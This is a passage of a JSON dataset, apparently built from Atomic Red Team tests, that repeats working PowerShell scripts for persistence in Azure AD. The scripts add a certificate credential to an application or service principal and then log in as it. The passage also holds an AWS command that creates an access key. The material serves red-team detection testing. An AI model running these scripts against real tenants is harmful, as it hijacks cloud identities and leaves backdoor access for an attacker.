Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"SuperApp\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\SuperApp.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\SuperApp.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"Passw0rd\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"$env:TEMP\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"$env:TEMP\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "aws iam create-access-key --user-name atomicredteam > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds\ncd $PathToAtomicsFolder/T1098.001/bin/\n./aws_secret.sh\n" + ], + "commands": [ + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 
30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type 
AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"SuperSP\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. 
In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\SuperSP.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\SuperSP.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"Passw0rd\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId 
$tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"$env:TEMP\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"$env:TEMP\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value 
$keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId 
-ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"SuperApp\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\SuperApp.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\SuperApp.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"Passw0rd\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"$env:TEMP\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"$env:TEMP\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. 
Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "aws iam create-access-key --user-name atomicredteam > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds\ncd $PathToAtomicsFolder/T1098.001/bin/\n./aws_secret.sh\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1098.001", + "display_name": "Account Manipulation: Additional Cloud Credentials", + "atomic_tests": [ + { + "name": "Azure AD Application Hijacking - Service Principal", + "auto_generated_guid": "b8e747c3-bdf7-4d71-bce2-f1df2a057406", + "description": "Add a certificate to an Application through its Service Principal.\nThe certificate can then be used to authenticate as the application and benefit from its rights.\nAn account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. 
The account authentication must be without MFA.\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "String", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "String", + "default": "p4sswd" + }, + "service_principal_name": { + "description": "Name of the targeted service principal", + "type": "String", + "default": "SuperSP" + }, + "certificate_password": { + "description": "Password of the new certificate", + "type": "String", + "default": "Passw0rd" + }, + "path_to_cert": { + "description": "Path of the new certificate, locally stored", + "type": "String", + "default": "$env:TEMP" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AzureAD module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. 
